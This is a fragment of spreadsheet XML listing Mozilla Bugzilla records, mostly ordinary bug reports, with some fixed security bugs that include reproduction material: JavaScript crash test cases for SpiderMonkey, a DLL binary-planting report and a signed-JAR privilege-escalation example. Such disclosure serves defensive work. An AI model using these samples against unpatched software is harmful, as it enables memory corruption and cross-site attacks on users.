      <c r="M3191" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3191" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3191" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3191" t="inlineStr"/>
      <c r="Q3191" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3191" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3191" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3191" t="n">
        <v>1</v>
      </c>
      <c r="U3191" t="n">
        <v>0</v>
      </c>
      <c r="V3191" t="n">
        <v>13</v>
      </c>
      <c r="W3191" t="inlineStr">
        <is>
          <t>ensure we're reporting data to newrelic for memcached, rabbitmq, etc so dev's can have more insight into production environment for development and supporting ops</t>
        </is>
      </c>
      <c r="X3191" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3192">
      <c r="A3192" t="n">
        <v>1871089</v>
      </c>
      <c r="B3192" t="inlineStr">
        <is>
          <t>2023-12-20 09:11:54 -0800</t>
        </is>
      </c>
      <c r="C3192" t="inlineStr">
        <is>
          <t>Wild pointer-deref from jitted code</t>
        </is>
      </c>
      <c r="D3192" t="inlineStr">
        <is>
          <t>2024-06-13 02:56:41 -0700</t>
        </is>
      </c>
      <c r="E3192" t="n">
        <v>1</v>
      </c>
      <c r="F3192" t="n">
        <v>1</v>
      </c>
      <c r="G3192" t="n">
        <v>3</v>
      </c>
      <c r="H3192" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3192" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3192" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3192" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3192" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3192" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3192" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3192" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3192" t="inlineStr">
        <is>
          <t>[adv-main122+]</t>
        </is>
      </c>
      <c r="Q3192" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3192" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3192" t="inlineStr">
        <is>
          <t>123 Branch</t>
        </is>
      </c>
      <c r="T3192" t="n">
        <v>1</v>
      </c>
      <c r="U3192" t="n">
        <v>0</v>
      </c>
      <c r="V3192" t="n">
        <v>22</v>
      </c>
      <c r="W3192" t="inlineStr">
        <is>
          <t>Steps to reproduce:
On git commit 3bd65516eb9b3a9568806d846ba8c81a9402a885 the attached sample crashes the js-shell when invoked as `obj-x86_64-pc-linux-gnu/dist/bin/js --fuzzing-safe --fast-warmup --gc-zeal=14 crash.js` The crash is flaky and might need a couple of attempts to manifest.
The crash occurs at the jitted instruction `mov DWORD PTR [rax+0xa0], ecx`, where rax points to unmapped memory.
Bisecting points to 71883785e1d2bed4392079a95e1caa45869cf0a1 related to bug 1868187. So this might be a debugger-related issue and not affecting users; still flagging as s-s just in case the bisect is a false positive.
```
function F0() {
    if (!new.target) { throw 'must be called with new'; }
}
const v2 = new F0();
const v5 = [0, 0, 0, 0, 0, 0, 0]; 
class C6 {
    constructor(a8, a9) {
        a8[a9];
    }   
    toString(a12, a13) {
        const t11 = this.constructor;
        new t11(v2);
        const t13 = this.constructor;
        new t13(3622, this);
    }   
}
const v18 = new C6("aaaa");
const v19 = new C6(v5);
const t19 = v19.constructor;
new t19("aaaa", v18);
```</t>
        </is>
      </c>
      <c r="X3192" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3193">
      <c r="A3193" t="n">
        <v>897393</v>
      </c>
      <c r="B3193" t="inlineStr">
        <is>
          <t>2013-07-24 01:32:18 -0700</t>
        </is>
      </c>
      <c r="C3193" t="inlineStr">
        <is>
          <t>[Keyboard] Build a sample 3rd party keyboard app for testing.</t>
        </is>
      </c>
      <c r="D3193" t="inlineStr">
        <is>
          <t>2013-09-05 00:59:29 -0700</t>
        </is>
      </c>
      <c r="E3193" t="n">
        <v>1</v>
      </c>
      <c r="F3193" t="n">
        <v>1</v>
      </c>
      <c r="G3193" t="n">
        <v>6</v>
      </c>
      <c r="H3193" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3193" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J3193" t="inlineStr">
        <is>
          <t>Gaia::Keyboard</t>
        </is>
      </c>
      <c r="K3193" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3193" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3193" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N3193" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3193" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3193" t="inlineStr">
        <is>
          <t>[ucid:SystemPlatform1, FT:System-Platform, koi:p1], [Sprint: ?]</t>
        </is>
      </c>
      <c r="Q3193" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3193" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3193" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3193" t="n">
        <v>1</v>
      </c>
      <c r="U3193" t="n">
        <v>0</v>
      </c>
      <c r="V3193" t="n">
        <v>6</v>
      </c>
      <c r="W3193" t="inlineStr">
        <is>
          <t>For user story, we would need a sample 3rd party keyboard app to test its working flow like installation, switch, and so on.</t>
        </is>
      </c>
      <c r="X3193" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3194">
      <c r="A3194" t="n">
        <v>642469</v>
      </c>
      <c r="B3194" t="inlineStr">
        <is>
          <t>2011-03-17 09:07:57 -0700</t>
        </is>
      </c>
      <c r="C3194" t="inlineStr">
        <is>
          <t>Binary planting potential in ThinkPadSensor::Startup</t>
        </is>
      </c>
      <c r="D3194" t="inlineStr">
        <is>
          <t>2024-05-29 15:49:00 -0700</t>
        </is>
      </c>
      <c r="E3194" t="n">
        <v>1</v>
      </c>
      <c r="F3194" t="n">
        <v>1</v>
      </c>
      <c r="G3194" t="n">
        <v>3</v>
      </c>
      <c r="H3194" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3194" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3194" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K3194" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3194" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3194" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3194" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3194" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3194" t="inlineStr">
        <is>
          <t>[sg:high] remote exploit possible, but browser needs to be shut down first [qa-examined-192][qa-needs-STR]</t>
        </is>
      </c>
      <c r="Q3194" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3194" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3194" t="inlineStr">
        <is>
          <t>mozilla6</t>
        </is>
      </c>
      <c r="T3194" t="n">
        <v>1</v>
      </c>
      <c r="U3194" t="n">
        <v>0</v>
      </c>
      <c r="V3194" t="n">
        <v>38</v>
      </c>
      <c r="W3194" t="inlineStr">
        <is>
          <t>Mitja Kolsek reported this today as a follow up to CVE-2010-3131.
-----
Our colleague noticed that one of the binary planting issues we reported to you last year during the "binary planting sweep" hasn't been fixed yet - or it has subsequently returned to the code. I have attached our report so you don't have to dig through the archives.
The test was done on Firefox 3.6.15. Soon-to-be-released Firefox 4 mitigates this issue to some extent by calling SetDllDirectory(""), but due to a bug in Windows, this mitigation is not fully effective (see
http://blog.acrossecurity.com/2010/10/breaking-setdlldirectory-protection.html). We confirmed that a "problematic" PATH entry, as described in this blog post, makes FF4 again vulnerable to binary planting through sensor.dll.
-----
A quick mxr search for sensor.dll turns up:
PRBool
ThinkPadSensor::Startup()
{
  mLibrary = LoadLibraryW(L"sensor.dll");
  if (!mLibrary)
    return PR_FALSE;
  gShockproofGetAccelerometerData = (ShockproofGetAccelerometerData)
    GetProcAddress(mLibrary, "ShockproofGetAccelerometerData");
  if (!gShockproofGetAccelerometerData) {
    FreeLibrary(mLibrary);
    mLibrary = nsnull;
    return PR_FALSE;
  }
  return PR_TRUE;
}
I'm copying Ehsan since he fixed a more recent version of one of these.</t>
        </is>
      </c>
      <c r="X3194" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3195">
      <c r="A3195" t="n">
        <v>1580056</v>
      </c>
      <c r="B3195" t="inlineStr">
        <is>
          <t>2019-09-09 18:28:46 -0700</t>
        </is>
      </c>
      <c r="C3195" t="inlineStr">
        <is>
          <t>Change default version of Thunderbird to 68</t>
        </is>
      </c>
      <c r="D3195" t="inlineStr">
        <is>
          <t>2021-09-03 09:41:21 -0700</t>
        </is>
      </c>
      <c r="E3195" t="n">
        <v>1</v>
      </c>
      <c r="F3195" t="n">
        <v>1</v>
      </c>
      <c r="G3195" t="n">
        <v>5</v>
      </c>
      <c r="H3195" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3195" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3195" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K3195" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3195" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3195" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3195" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3195" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3195" t="inlineStr"/>
      <c r="Q3195" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3195" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3195" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3195" t="n">
        <v>1</v>
      </c>
      <c r="U3195" t="n">
        <v>0</v>
      </c>
      <c r="V3195" t="n">
        <v>2</v>
      </c>
      <c r="W3195" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1481976 +++
The latest version of Thunderbird is 68, but the content of the KB defaults to 60. We need to change the default to 68.</t>
        </is>
      </c>
      <c r="X3195" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3196">
      <c r="A3196" t="n">
        <v>754150</v>
      </c>
      <c r="B3196" t="inlineStr">
        <is>
          <t>2012-05-10 18:49:26 -0700</t>
        </is>
      </c>
      <c r="C3196" t="inlineStr">
        <is>
          <t>Assertion failure: IsMarkedOrAllocated(static_cast&lt;Cell *&gt;(thing)), at js/src/jsgc.cpp:4399</t>
        </is>
      </c>
      <c r="D3196" t="inlineStr">
        <is>
          <t>2013-01-14 08:36:34 -0800</t>
        </is>
      </c>
      <c r="E3196" t="n">
        <v>1</v>
      </c>
      <c r="F3196" t="n">
        <v>1</v>
      </c>
      <c r="G3196" t="n">
        <v>3</v>
      </c>
      <c r="H3196" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3196" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3196" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3196" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3196" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3196" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3196" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3196" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3196" t="inlineStr">
        <is>
          <t>[sg:critical][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3196" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3196" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3196" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T3196" t="n">
        <v>1</v>
      </c>
      <c r="U3196" t="n">
        <v>0</v>
      </c>
      <c r="V3196" t="n">
        <v>9</v>
      </c>
      <c r="W3196" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central revision 4c6d01c92dcc (options -m -n):
function printStatus (msg) {}
function toPrinted(value) {
  value = value.replace(/\\n/g, 'NL')
}
function reportCompare (expected, actual, description) {
    printStatus ("Expected value '" + toPrinted(expected) +  "' matched actual value '" + toPrinted(actual) + "'");
}
var UBound = 0;
var statusitems = [];
var actual = '';
var actualvalues = [];
var expect= '';
var expectedvalues = [];
testThis('x()');
testThis('"abc"()');
testThis('x()');
testThis('Date(12345)()');
testThis('x()');
testThis('1()');
testThis('x()');
testThis('void(0)()');
testThis('x()');
testThis('[1,2,3,4,5](1)');
gczeal(4);
testThis('x(1)');
checkThis('(function (y) {return y+1;})("abc")');
checkThis('f("abc")');
function testThis(sInvalidSyntax) {
  expectedvalues[UBound] = expect;
  actualvalues[UBound] = actual;
  UBound++;
}
function checkThis(sValidSyntax) {
  for (var i=0; i&lt;UBound; i++)
    reportCompare(expectedvalues[i], actualvalues[i], statusitems[i]);
}
var actualvalues = [];
for (var i=0; i&lt;UBound; i++)
  reportCompare(expectedvalues[i], actualvalues[i], statusitems[i]);
Might be another verifier (debug-only) bug, but I'm marking s-s until this is confirmed.</t>
        </is>
      </c>
      <c r="X3196" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3197">
      <c r="A3197" t="n">
        <v>681508</v>
      </c>
      <c r="B3197" t="inlineStr">
        <is>
          <t>2011-08-23 16:13:29 -0700</t>
        </is>
      </c>
      <c r="C3197" t="inlineStr">
        <is>
          <t>Prefix API to mozApps instead of apps</t>
        </is>
      </c>
      <c r="D3197" t="inlineStr">
        <is>
          <t>2011-12-08 14:09:48 -0800</t>
        </is>
      </c>
      <c r="E3197" t="n">
        <v>1</v>
      </c>
      <c r="F3197" t="n">
        <v>1</v>
      </c>
      <c r="G3197" t="n">
        <v>5</v>
      </c>
      <c r="H3197" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3197" t="inlineStr">
        <is>
          <t>Web Apps</t>
        </is>
      </c>
      <c r="J3197" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3197" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3197" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3197" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3197" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3197" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3197" t="inlineStr"/>
      <c r="Q3197" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3197" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3197" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3197" t="n">
        <v>1</v>
      </c>
      <c r="U3197" t="n">
        <v>0</v>
      </c>
      <c r="V3197" t="n">
        <v>11</v>
      </c>
      <c r="W3197" t="inlineStr">
        <is>
          <t>The recommended namespace for any non-standardized API is with a 'moz' prefix. navigator.apps must thus be renamed to navigator.mozApps</t>
        </is>
      </c>
      <c r="X3197" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3198">
      <c r="A3198" t="n">
        <v>616478</v>
      </c>
      <c r="B3198" t="inlineStr">
        <is>
          <t>2010-12-03 08:30:36 -0800</t>
        </is>
      </c>
      <c r="C3198" t="inlineStr">
        <is>
          <t>Search filters set incorrectly</t>
        </is>
      </c>
      <c r="D3198" t="inlineStr">
        <is>
          <t>2011-02-28 14:02:11 -0800</t>
        </is>
      </c>
      <c r="E3198" t="n">
        <v>1</v>
      </c>
      <c r="F3198" t="n">
        <v>1</v>
      </c>
      <c r="G3198" t="n">
        <v>5</v>
      </c>
      <c r="H3198" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3198" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3198" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K3198" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3198" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3198" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3198" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3198" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3198" t="inlineStr"/>
      <c r="Q3198" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3198" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3198" t="inlineStr">
        <is>
          <t>2.4</t>
        </is>
      </c>
      <c r="T3198" t="n">
        <v>1</v>
      </c>
      <c r="U3198" t="n">
        <v>0</v>
      </c>
      <c r="V3198" t="n">
        <v>5</v>
      </c>
      <c r="W3198" t="inlineStr">
        <is>
          <t>Currently when I search from the mobile start page with Android and mobile firefox set has my Help with selection I don't get any mobile articles in my search results.
The results url has windows and fx 3.6 set:
https://support.mozilla.com/en-US/search?os=1&amp;fx=2&amp;q=how+to+install+firefox+for+mobile&amp;x=27&amp;y=18
When the os and fx version are set correctly the search works:
https://support.mozilla.com/en-US/search?os=5&amp;fx=4&amp;q=how+to+install+firefox+mobile&amp;x=0&amp;y=0
This is pretty important to have for the upcoming mobile B3 release.</t>
        </is>
      </c>
      <c r="X3198" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3199">
      <c r="A3199" t="n">
        <v>424426</v>
      </c>
      <c r="B3199" t="inlineStr">
        <is>
          <t>2008-03-21 14:17:28 -0700</t>
        </is>
      </c>
      <c r="C3199" t="inlineStr">
        <is>
          <t>[FIX]Downgrading codebase principals in signed jars is not effective</t>
        </is>
      </c>
      <c r="D3199" t="inlineStr">
        <is>
          <t>2008-11-12 17:54:53 -0800</t>
        </is>
      </c>
      <c r="E3199" t="n">
        <v>1</v>
      </c>
      <c r="F3199" t="n">
        <v>1</v>
      </c>
      <c r="G3199" t="n">
        <v>3</v>
      </c>
      <c r="H3199" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3199" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3199" t="inlineStr">
        <is>
          <t>Security: CAPS</t>
        </is>
      </c>
      <c r="K3199" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3199" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3199" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3199" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3199" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3199" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q3199" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3199" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3199" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3199" t="n">
        <v>1</v>
      </c>
      <c r="U3199" t="n">
        <v>0</v>
      </c>
      <c r="V3199" t="n">
        <v>32</v>
      </c>
      <c r="W3199" t="inlineStr">
        <is>
          <t>Following up on bug 424188, relative paths in signed JARs are still dangerous. Here is an example of code that, if signed, would lead to universal XSS with on users who trust the signer:
&lt;script&gt;
function getURL(url) {
  netscape.security.PrivilegeManager.enablePrivilege('UniversalBrowserRead');
  var xhr = new XMLHttpRequest();
  xhr.open('GET', url, false);
  xhr.send(null);
  return xhr.responseText;
}
&lt;/script&gt;
&lt;script src="some_relative_path.js"&gt;&lt;/script&gt;
You can try this test case ("Globals") at &lt;http://crypto.stanford.edu/~collinj/research/signed-scripts/more-relative-paths.html&gt;.
The problem is that attacker can swap in a malicious unsigned some_relative_path.js file. Although this script downgrades the privileges of the document, the getURL function has already been defined before the downgrade, so it can still request privileges on behalf of the signer.
Even if you downgrade the principal associated will all the window's closures, this attack may still work if the getURL function was defined in another frame. See the "Remote-window Globals" test case.</t>
        </is>
      </c>
      <c r="X3199" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3200">
      <c r="A3200" t="n">
        <v>432260</v>
      </c>
      <c r="B3200" t="inlineStr">
        <is>
          <t>2008-05-05 10:21:56 -0700</t>
        </is>
      </c>
      <c r="C3200" t="inlineStr">
        <is>
          <t>[@ pkix_pl_HttpDefaultClient_HdrCheckComplete - PKIX_PL_Memcpy] crashes when there is no content-length header in the http response</t>
        </is>
      </c>
      <c r="D3200" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E3200" t="n">
        <v>1</v>
      </c>
      <c r="F3200" t="n">
        <v>1</v>
      </c>
      <c r="G3200" t="n">
        <v>3</v>
      </c>
      <c r="H3200" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3200" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J3200" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K3200" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L3200" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3200" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3200" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3200" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3200" t="inlineStr">
        <is>
          <t>PKIX SUN_MUST_HAVE</t>
        </is>
      </c>
      <c r="Q3200" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3200" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3200" t="inlineStr">
        <is>
          <t>3.12.2</t>
        </is>
      </c>
      <c r="T3200" t="n">
        <v>1</v>
      </c>
      <c r="U3200" t="n">
        <v>0</v>
      </c>
      <c r="V3200" t="n">
        <v>25</v>
      </c>
      <c r="W3200" t="inlineStr">
        <is>
          <t>Using a debug trunk build, I ran the command
   vfyserv -o www.diginotar.nl
and it crashed with a segmentation violation in libPKIX.  Stack below.
I don't understand why it was in libPKIX at all.  
I had not set the environment variables to make NSS use libPKIX.
nss3.dll!PKIX_PL_Memcpy(void * source=0x00dcf978, 
unsigned int length=0x00000330, void * * pDest=0x010af520, 
void * plContext=0x00000000)  Line 225 + 0x13 bytes
nss3.dll!pkix_pl_HttpDefaultClient_HdrCheckComplete(
PKIX_PL_HttpDefaultClientStruct * client=0x00dccf1c, 
unsigned int bytesRead=0x00000400, int * pKeepGoing=0x010af5e8, 
void * plContext=0x00000000)  Line 350 + 0x1e bytes
nss3.dll!pkix_pl_HttpDefaultClient_RecvHdr(
PKIX_PL_HttpDefaultClientStruct * client=0x00dccf1c, 
int * pKeepGoing=0x010af5e8, 
void * plContext=0x00000000)  Line 861 + 0x15 bytes
nss3.dll!pkix_pl_HttpDefaultClient_Dispatch(PKIX_PL_HttpDefaultClientStruct * client=0x00dccf1c, void * plContext=0x00000000)  Line 1129 + 0x11 bytes
nss3.dll!pkix_pl_HttpDefaultClient_TrySendAndReceive(
void * request=0x00dccf1c, 
unsigned short * http_response_code=0x010af6e0, 
const char * * http_response_content_type=0x00000000, 
const char * * http_response_headers=0x00000000, 
const char * * http_response_data=0x010af6ec, 
unsigned int * http_response_data_len=0x010af6d8, 
PRPollDesc * * pPollDesc=0x00000000, _SECStatus * pSECReturn=0x010af6b0, 
void * plContext=0x00000000)  Line 1484 + 0xd bytes
nss3.dll!pkix_pl_HttpDefaultClient_TrySendAndReceiveFcn(
void * request=0x00dccf1c, PRPollDesc * * pPollDesc=0x00000000, 
unsigned short * http_response_code=0x010af6e0, 
const char * * http_response_content_type=0x00000000, 
const char * * http_response_headers=0x00000000, 
const char * * http_response_data=0x010af6ec, 
unsigned int * http_response_data_len=0x010af6d8)  Line 1692 + 0x2b bytes
nss3.dll!fetchOcspHttpClientV1(PLArenaPool * arena=0x00000000, 
const SEC_HttpClientFcnV1Struct * hcv1=0x0065bd20, 
char * location=0x00dca668, 
SECItemStr * encodedRequest=0x00dca620)  Line 3322 + 0x1e bytes
nss3.dll!ocsp_GetEncodedOCSPResponseFromRequest(
PLArenaPool * arena=0x00000000, CERTOCSPRequestStr * request=0x00dced08, 
char * location=0x00dca668, __int64 time=0x00044c7eab7e111e, 
int addServiceLocator=0x00000000, void * pwArg=0x00000000, 
CERTOCSPRequestStr * * pRequest=0x010af784)  Line 3451 + 0x18 bytes
nss3.dll!ocsp_GetEncodedOCSPResponseForSingleCert(
PLArenaPool * arena=0x00000000, CERTOCSPCertIDStr * certID=0x00dc8920, 
CERTCertificateStr * singleCert=0x00dc11c8, char * location=0x00dca668, 
__int64 time=0x00044c7eab7e111e, int addServiceLocator=0x00000000, 
void * pwArg=0x00000000, 
CERTOCSPRequestStr * * pRequest=0x010af784)  Line 3495 + 0x25 bytes
nss3.dll!ocsp_GetOCSPStatusFromNetwork(NSSTrustDomainStr * handle=0x00d89de8, 
CERTOCSPCertIDStr * certID=0x00dc8920, CERTCertificateStr * cert=0x00dc11c8, 
__int64 time=0x00044c7eab7e111e, void * pwArg=0x00000000, 
int * certIDWasConsumed=0x010af7d8, 
_SECStatus * rv_ocsp=0x010af7dc)  Line 4795 + 0x27 bytes
nss3.dll!CERT_CheckOCSPStatus()          Line 4703 + 0x25 bytes
nss3.dll!CERT_VerifyCertificate()        Line 1310 + 0x1b bytes
nss3.dll!CERT_VerifyCertificateNow()     Line 1521 + 0x2b bytes
vfyserv.exe!myAuthCertificate()          Line 153 + 0x1f bytes
ssl3.dll!ssl3_HandleCertificate()        Line 7260 + 0x21 bytes
ssl3.dll!ssl3_HandleHandshakeMessage()   Line 7938 + 0x11 bytes
ssl3.dll!ssl3_HandleHandshake()          Line 8062 + 0x19 bytes
ssl3.dll!ssl3_HandleRecord()             Line 8325 + 0xd bytes
ssl3.dll!ssl3_GatherCompleteHandshake()  Line 206 + 0x17 bytes
ssl3.dll!ssl_GatherRecord1stHandshake()  Line 1258 + 0xb bytes
ssl3.dll!ssl_Do1stHandshake()            Line 151 + 0xf bytes
ssl3.dll!ssl_SecureSend()                Line 1152 + 0x9 bytes
ssl3.dll!ssl_SecureWrite()               Line 1197 + 0x13 bytes
ssl3.dll!ssl_Write()                     Line 1487 + 0x17 bytes
nspr4.dll!PR_Write()                     Line 146 + 0x16 bytes
vfyserv.exe!handle_connection()          Line 233 + 0x1d bytes
vfyserv.exe!do_connects()                Line 348 + 0x10 bytes
vfyserv.exe!thread_wrapper()             Line 450 + 0x15 bytes</t>
        </is>
      </c>
      <c r="X3200" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3201">
      <c r="A3201" t="n">
        <v>1187067</v>
      </c>
      <c r="B3201" t="inlineStr">
        <is>
          <t>2015-07-23 14:24:01 -0700</t>
        </is>
      </c>
      <c r="C3201" t="inlineStr">
        <is>
          <t>Stagefright: NULL deref [@stagefright::MPEG4Extractor::parseChunk]</t>
        </is>
      </c>
      <c r="D3201" t="inlineStr">
        <is>
          <t>2016-11-02 17:01:30 -0700</t>
        </is>
      </c>
      <c r="E3201" t="n">
        <v>1</v>
      </c>
      <c r="F3201" t="n">
        <v>1</v>
      </c>
      <c r="G3201" t="n">
        <v>3</v>
      </c>
      <c r="H3201" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3201" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3201" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K3201" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3201" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3201" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3201" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3201" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3201" t="inlineStr">
        <is>
          <t>[sg:dos]</t>
        </is>
      </c>
      <c r="Q3201" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
